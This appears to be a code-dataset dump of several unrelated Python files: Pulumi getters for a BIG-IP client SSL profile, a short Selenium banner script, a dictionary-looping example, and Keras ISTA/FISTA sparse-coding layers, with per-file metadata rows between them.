@pulumi.getter(name="cacheSize")
def cache_size(self) -> pulumi.Output[int]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> pulumi.Output[int]:
"""
Cache time out
"""
return pulumi.get(self, "cache_timeout")
@property
@pulumi.getter
def cert(self) -> pulumi.Output[str]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> pulumi.Output[Sequence[str]]:
"""
Cert extension includes for ssl forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> pulumi.Output[Sequence['outputs.ProfileClientSslCertKeyChain']]:
return pulumi.get(self, "cert_key_chains")
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> pulumi.Output[int]:
"""
Life span of the certificate in days for ssl forward proxy
"""
return pulumi.get(self, "cert_life_span")
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> pulumi.Output[str]:
"""
Cert lookup by ip address and port enabled / disabled
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@property
@pulumi.getter
def chain(self) -> pulumi.Output[str]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
"""
return pulumi.get(self, "chain")
@property
@pulumi.getter
def ciphers(self) -> pulumi.Output[str]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> pulumi.Output[str]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> pulumi.Output[str]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> pulumi.Output[Optional[str]]:
"""
Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
"""
return pulumi.get(self, "defaults_from")
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> pulumi.Output[str]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> pulumi.Output[str]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@property
@pulumi.getter
def generation(self) -> pulumi.Output[int]:
"""
generation
"""
return pulumi.get(self, "generation")
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> pulumi.Output[str]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> pulumi.Output[str]:
"""
Handshake time out (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> pulumi.Output[str]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> pulumi.Output[str]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@property
@pulumi.getter
def mode(self) -> pulumi.Output[str]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mode")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def partition(self) -> pulumi.Output[str]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@property
@pulumi.getter
def passphrase(self) -> pulumi.Output[str]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> pulumi.Output[str]:
"""
Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
"""
return pulumi.get(self, "peer_cert_mode")
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> pulumi.Output[str]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> pulumi.Output[str]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> pulumi.Output[str]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> pulumi.Output[str]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> pulumi.Output[str]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> pulumi.Output[str]:
"""
Renogotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> pulumi.Output[str]:
"""
Renogotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@property
@pulumi.getter
def renegotiation(self) -> pulumi.Output[str]:
"""
Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "renegotiation")
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> pulumi.Output[str]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> pulumi.Output[str]:
"""
Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
"""
return pulumi.get(self, "secure_renegotiation")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> pulumi.Output[str]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> pulumi.Output[str]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> pulumi.Output[str]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> pulumi.Output[str]:
"""
Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "sni_require")
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> pulumi.Output[str]:
"""
Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@property
@pulumi.getter(name="sslForwardProxy")
def ssl_forward_proxy(self) -> pulumi.Output[str]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> pulumi.Output[str]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> pulumi.Output[str]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> pulumi.Output[str]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> pulumi.Output[Sequence[str]]:
"""
List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
"""
return pulumi.get(self, "tm_options")
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> pulumi.Output[str]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
| 51.213974 | 393 | 0.677169 | 17,430 | 140,736 | 5.255995 | 0.022834 | 0.090054 | 0.097651 | 0.10086 | 0.978191 | 0.97473 | 0.968356 | 0.965419 | 0.964382 | 0.948151 | 0 | 0.002033 | 0.227468 | 140,736 | 2,747 | 394 | 51.232617 | 0.840586 | 0.354749 | 0 | 0.936556 | 1 | 0 | 0.109837 | 0.030796 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170393 | false | 0.077341 | 0.00423 | 0.001813 | 0.276737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
8df2a2bc5aeb7b8beed076eade360db0ca9f360b | 211 | py | Python | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | print('------------------Selenium Web Service-------------------')
print('----------------Developed by Be9Concepts-----------------')
print('')
print('+++++++++++++++++++++Service Started+++++++++++++++++++++')
| 42.2 | 66 | 0.350711 | 12 | 211 | 6.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0.042654 | 211 | 4 | 67 | 52.75 | 0.361386 | 0 | 0 | 0 | 0 | 0 | 0.810427 | 0.763033 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
30992d732771e406628f37276805ab20c8914576 | 322 | py | Python | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | student_grades = {"Mary": 9.1, "Sam": 8.8, "John": 7.5}
# for grades in student_grades.items():
# print(grades) # ('Mary', 9.1)
# # ('Sam', 8.8)
# # ('John', 7.5)
for grades in student_grades.values():
print(grades) # 9.1
# 8.8
# 7.5
| 26.833333 | 55 | 0.425466 | 42 | 322 | 3.190476 | 0.357143 | 0.291045 | 0.164179 | 0.179104 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0 | 0.091371 | 0.388199 | 322 | 11 | 56 | 29.272727 | 0.588832 | 0.465839 | 0 | 0 | 0 | 0 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30f40c2b7b91a297cf31fb6cdf0db053631d4681 | 21,711 | py | Python | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 8 | 2020-09-27T09:04:07.000Z | 2021-10-06T15:23:06.000Z | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 5 | 2020-07-27T14:31:05.000Z | 2022-02-10T02:17:50.000Z | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 1 | 2021-02-22T10:56:26.000Z | 2021-02-22T10:56:26.000Z | """
Copyright (c) 2020 Bahareh Tolooshams
Custom layer to do ISTA or FISTA for convolutional dictionary.
:author: Bahareh Tolooshams
"""
from keras import backend as K
from keras.layers import Conv1D, Conv2D, InputSpec, Dense, Reshape
from keras.initializers import (
Identity,
Initializer,
Constant,
Ones,
Zeros,
RandomNormal,
)
from keras.activations import relu
from keras.constraints import non_neg
import numpy as np
import tensorflow as tf
class ISTA_1d(Conv1D):
"""
ISTA layer for tied convolutional weights (H,HT) 1d case.
"""
def __init__(
self, tied_layer, y, L, lambda_trainable, twosided, num_iterations, **kwargs
):
"""
Constructor
:param tied_layer: Conv1D layer that used as HT.
:param y: input data
:param L: 1/L is the step size from ISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iteraitons of ISTA
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-2]
self.output_dim2 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
super().__init__(
(self.output_dim1, self.output_dim2),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer as flipped
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reshape(
self.kernel, (self.kernel_size[0], self.tied_layer.output_shape[2], 1)
)
# Set bias from the lambda_value
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[2],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def ista_iteration(z_old, ctr):
"""
ISTA iteration
:param z_old: sparse code form previous iteraiton
:param ctr: counter for monitor the iteration
:return: z_new, ctr+1
"""
# zero-pad
paddings = tf.constant(
[[0, 0], [self.kernel_size[0] - 1, self.kernel_size[0] - 1], [0, 0]]
)
z_pad = tf.pad(z_old, paddings, "CONSTANT")
# Hz
H_z_old = K.conv1d(z_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_z_old)
# convolve with HT
HT_res = K.conv1d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(z_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
bias_with_L = self.lambda_value / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0], tf.zeros((self.output_dim1, 1), dtype=tf.float32)
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim2 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, 1), dtype=tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=1)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
z_new = output
return z_new, ctr + 1
def cond(z, ctr):
"""
condition to monitor the maximum iteraiton
:param z: sparse code
:param ctr: counter for monitor the iteration
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize the while loop variables
loop_vars = (z, 0)
# perform ISTA
output = tf.while_loop(cond, ista_iteration, loop_vars, parallel_iterations=1)
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
return input_shape[0], self.output_dim1, self.output_dim2
class FISTA_1d(Conv1D):
"""
FISTA layer for tied convolutional weights (H,HT) 1d case.
"""
def __init__(
self,
tied_layer,
y,
L,
lambda_trainable,
twosided,
num_iterations,
lambda_single=False,
lambda_EM=False,
**kwargs
):
"""
Constructor
:param tied_layer: Conv1D layer that used as HT.
:param y: input data
:param L: 1/L is the step size from FISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iteraitons of FISTA
:param lambda_signel: True for sharing one lambda for all filters
:param lambda_EM: False for backprop, True for closed-form given code
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-2]
self.output_dim2 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
self.lambda_single = lambda_single
self.lambda_EM = lambda_EM
super().__init__(
(self.output_dim1, self.output_dim2),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer as flipped
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reshape(
self.kernel, (self.kernel_size[0], self.tied_layer.output_shape[2], 1)
)
# Set bias from the lambda_value
if self.lambda_single:
self.bias = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
else:
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[2],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# noiseSTD
self.noiseSTD = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="noiseSTD",
regularizer=self.bias_regularizer,
trainable=False,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def fista_iteration(z_old, x_old, s_old, ctr):
"""
FISTA iteration
:param z_old: sparse code form previous iteraiton
:param x_old: the new point used in FISTA
:param s_old: s variable used in FISTA
:param ctr: counter for monitor the iteration
:return: z_new, x_new, s_new, ctr+1
"""
s_new = (1.0 + tf.sqrt(1.0 + 4.0 * s_old * s_old)) / 2.0
# zero-pad
paddings = tf.constant(
[[0, 0], [self.kernel_size[0] - 1, self.kernel_size[0] - 1], [0, 0]]
)
x_pad = tf.pad(x_old, paddings, "CONSTANT")
# Hx
H_x_old = K.conv1d(x_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_x_old)
# convolve with HT
HT_res = K.conv1d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(x_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
if self.lambda_single:
bias_with_L = tf.zeros((self.tied_layer.output_shape[2],)) + (
(self.bias * (self.noiseSTD ** 2)) / self.L
)
else:
bias_with_L = (self.bias * (self.noiseSTD ** 2)) / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0], tf.zeros((self.output_dim1, 1), dtype=tf.float32)
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim2 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, 1), dtype=tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=1)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
# get z_new
z_new = output
# get x_new point from z_new
z_new_z_old_res = tf.add(z_new, -1 * z_old)
t_z_new_z_old_res = tf.multiply(z_new_z_old_res, (s_old - 1.0) / s_new)
x_new = tf.add(z_new, t_z_new_z_old_res)
return z_new, x_new, s_new, ctr + 1
def cond(z, x, s, ctr):
"""
condition to monitor the maximum iteraiton
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize s
s = 1.0
# initialize the while loop variables
loop_vars = (z, z, s, 0)
# perform FISTA
output = tf.while_loop(cond, fista_iteration, loop_vars, parallel_iterations=1)
if self.lambda_trainable:
if not self.lambda_EM:
lambda_term = tf.zeros((self.output_dim2))
lambda_term += self.bias
return [output[0], lambda_term]
else:
return output[0]
else:
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
if self.lambda_trainable:
if not self.lambda_EM:
if self.lambda_single:
return [
(input_shape[0], self.output_dim1, self.output_dim2),
(input_shape[0], 1),
]
else:
return [
(input_shape[0], self.output_dim1, self.output_dim2),
(input_shape[0], self.output_dim2),
]
else:
return (input_shape[0], self.output_dim1, self.output_dim2)
else:
return (input_shape[0], self.output_dim1, self.output_dim2)
class FISTA_2d(Conv2D):
"""
FISTA layer for tied convolutional weights (H,HT) 2d case.
"""
def __init__(
self,
tied_layer,
y,
L,
lambda_trainable,
twosided,
num_iterations,
lambda_single=False,
lambda_EM=False,
**kwargs
):
"""
Constructor
:param tied_layer: Conv1D layer that used as HT.
:param y: input data
:param L: 1/L is the step size from FISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iteraitons of FISTA
:param lambda_signel: True for sharing one lambda for all filters
:param lambda_EM: False for backprop, True for closed-form given code
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-3]
self.output_dim2 = tied_layer.output_shape[-2]
self.output_dim3 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
self.lambda_single = lambda_single
self.lambda_EM = lambda_EM
super().__init__(
(self.output_dim1, self.output_dim2, self.output_dim3),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reverse(self.kernel, axes=1)
self.kernel = K.reshape(
self.kernel,
(
self.kernel_size[0],
self.kernel_size[1],
self.tied_layer.output_shape[-1],
1,
),
)
# Set bias from the lambda_value
if self.lambda_single:
self.bias = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
else:
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[3],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# noiseSTD
self.noiseSTD = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="noiseSTD",
regularizer=self.bias_regularizer,
trainable=False,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def fista_iteration(z_old, x_old, s_old, ctr):
"""
FISTA iteration
:param z_old: sparse code form previous iteraiton
:param x_old: the new point used in FISTA
:param s_old: s variable used in FISTA
:param ctr: counter for monitor the iteration
:return: z_new, x_new, s_new, ctr+1
"""
s_new = (1.0 + tf.sqrt(1.0 + 4.0 * s_old * s_old)) / 2.0
# zero-pad
paddings = tf.constant(
[
[0, 0],
[self.kernel_size[0] - 1, self.kernel_size[0] - 1],
[self.kernel_size[1] - 1, self.kernel_size[1] - 1],
[0, 0],
]
)
x_pad = tf.pad(x_old, paddings, "CONSTANT")
# Hx
H_x_old = K.conv2d(x_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_x_old)
# convolve with HT
HT_res = K.conv2d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(x_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
if self.lambda_single:
bias_with_L = tf.zeros((self.tied_layer.output_shape[3],)) + (
(self.bias * (self.noiseSTD ** 2)) / self.L
)
else:
bias_with_L = (self.bias * (self.noiseSTD ** 2)) / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0],
tf.zeros((self.output_dim1, self.output_dim2, 1), tf.float32),
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim3 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, self.output_dim2, 1), tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=2)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
# get z_new
z_new = output
# get x_new point from z_new
z_new_z_old_res = tf.add(z_new, -1 * z_old)
t_z_new_z_old_res = tf.multiply(z_new_z_old_res, (s_old - 1.0) / s_new)
x_new = tf.add(z_new, t_z_new_z_old_res)
return z_new, x_new, s_new, ctr + 1
def cond(z, x, s, ctr):
"""
condition to monitor the maximum iteraiton
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize s
s = 1.0
# initialize the while loop variables
loop_vars = (z, z, s, 0)
# perform FISTA
output = tf.while_loop(cond, fista_iteration, loop_vars, parallel_iterations=1)
if self.lambda_trainable:
if not self.lambda_EM:
lambda_term = tf.zeros((self.output_dim3))
lambda_term += self.bias
return [output[0], lambda_term]
else:
return output[0]
else:
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
if self.lambda_trainable:
if not self.lambda_EM:
if self.lambda_single:
return [
(
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
),
(input_shape[0], 1),
]
else:
return [
(
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
),
(input_shape[0], self.output_dim3),
]
else:
return (
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
)
else:
return (
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
)
| 36.427852 | 87 | 0.535996 | 2,640 | 21,711 | 4.19697 | 0.077273 | 0.046029 | 0.030505 | 0.032491 | 0.946119 | 0.942238 | 0.933484 | 0.925812 | 0.91444 | 0.913538 | 0 | 0.019437 | 0.376768 | 21,711 | 595 | 88 | 36.489076 | 0.799424 | 0.192944 | 0 | 0.780788 | 0 | 0 | 0.006693 | 0 | 0 | 0 | 0 | 0 | 0.007389 | 1 | 0.044335 | false | 0 | 0.017241 | 0.002463 | 0.123153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a509c3106f644cb718926aba7ef7874947789733 | 670 | py | Python | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
